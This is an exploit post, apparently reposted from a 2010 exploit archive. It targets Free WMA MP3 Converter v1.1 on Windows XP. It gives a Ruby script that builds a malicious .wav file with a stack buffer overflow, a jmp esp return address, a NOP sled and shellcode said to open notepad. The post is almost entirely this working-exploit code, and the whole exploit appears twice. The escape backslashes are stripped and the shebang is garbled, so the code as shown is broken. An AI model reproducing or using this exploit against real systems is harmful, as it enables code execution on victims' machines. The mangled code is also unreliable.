Free WMA MP3 Converter v1.1 0day
Posted on 02 April 2010
================================ Free WMA MP3 Converter v1.1 0day ================================ # Author: Richard leahy # Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210 # Version: 1.1 # Tested on: Windows Xp Sp2 #category local exploit to trigger vulnrability open up application choose wav to mp3 load the specially crafted wav file and click convert. Probably works for all the other options too eg mp3 to wav etc. run the code below and pipe it into a .wav file #code !#/usr/bin/env ruby nop = "x90" #imagehlp jmp_esp = [0x76cafa32].pack('V') #shellcode opens notepad shellcode = "xd9xc7xd9x74x24xf4xbaxccx7axcbxf7x33xc9xb1" + "x33x5ex83xeexfcx31x56x13x03x9ax69x29x02xde" + "x66x24xedx1ex77x57x67xfbx46x45x13x88xfbx59" + "x57xdcxf7x12x35xf4x8cx57x92xfbx25xddxc4x32" + "xb5xd3xc8x98x75x75xb5xe2xa9x55x84x2dxbcx94" + "xc1x53x4fxc4x9ax18xe2xf9xafx5cx3fxfbx7fxeb" + "x7fx83xfax2bx0bx39x04x7bxa4x36x4ex63xcex11" + "x6fx92x03x42x53xddx28xb1x27xdcxf8x8bxc8xef" + "xc4x40xf7xc0xc8x99x3fxe6x32xecx4bx15xcexf7" + "x8fx64x14x7dx12xcexdfx25xf6xefx0cxb3x7dxe3" + "xf9xb7xdaxe7xfcx14x51x13x74x9bxb6x92xcexb8" + "x12xffx95xa1x03xa5x78xddx54x01x24x7bx1exa3" + "x31xfdx7dxa9xc4x8fxfbx94xc7x8fx03xb6xafxbe" + "x88x59xb7x3ex5bx1ex47x75xc6x36xc0xd0x92x0b" + "x8dxe2x48x4fxa8x60x79x2fx4fx78x08x2ax0bx3e" + "xe0x46x04xabx06xf5x25xfex69x96xadx64x06x09" + "x2ax67xec" boom = "x41" * 4112 + jmp_esp + nop * 10 + shellcode puts boom # Date: 02/04/2010 # Author: Richard leahy # Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210 # Version: 1.1 # Tested on: Windows Xp Sp2 #category local exploit to trigger vulnrability open up application choose wav to mp3 load the specially crafted wav file and click convert. Probably works for all the other options too eg mp3 to wav etc. run the code below and pipe it into a .wav file #code !#/usr/bin/env ruby nop = "x90" #imagehlp jmp_esp = [0x76cafa32].pack('V') #shellcode opens notepad shellcode = "xd9xc7xd9x74x24xf4xbaxccx7axcbxf7x33xc9xb1" + "x33x5ex83xeexfcx31x56x13x03x9ax69x29x02xde" + "x66x24xedx1ex77x57x67xfbx46x45x13x88xfbx59" + "x57xdcxf7x12x35xf4x8cx57x92xfbx25xddxc4x32" + "xb5xd3xc8x98x75x75xb5xe2xa9x55x84x2dxbcx94" + "xc1x53x4fxc4x9ax18xe2xf9xafx5cx3fxfbx7fxeb" + "x7fx83xfax2bx0bx39x04x7bxa4x36x4ex63xcex11" + "x6fx92x03x42x53xddx28xb1x27xdcxf8x8bxc8xef" + "xc4x40xf7xc0xc8x99x3fxe6x32xecx4bx15xcexf7" + "x8fx64x14x7dx12xcexdfx25xf6xefx0cxb3x7dxe3" + "xf9xb7xdaxe7xfcx14x51x13x74x9bxb6x92xcexb8" + "x12xffx95xa1x03xa5x78xddx54x01x24x7bx1exa3" + "x31xfdx7dxa9xc4x8fxfbx94xc7x8fx03xb6xafxbe" + "x88x59xb7x3ex5bx1ex47x75xc6x36xc0xd0x92x0b" + "x8dxe2x48x4fxa8x60x79x2fx4fx78x08x2ax0bx3e" + "xe0x46x04xabx06xf5x25xfex69x96xadx64x06x09" + "x2ax67xec" boom = "x41" * 4112 + jmp_esp + nop * 10 + shellcode puts boom # Inj3ct0r.com [2010-04-02]
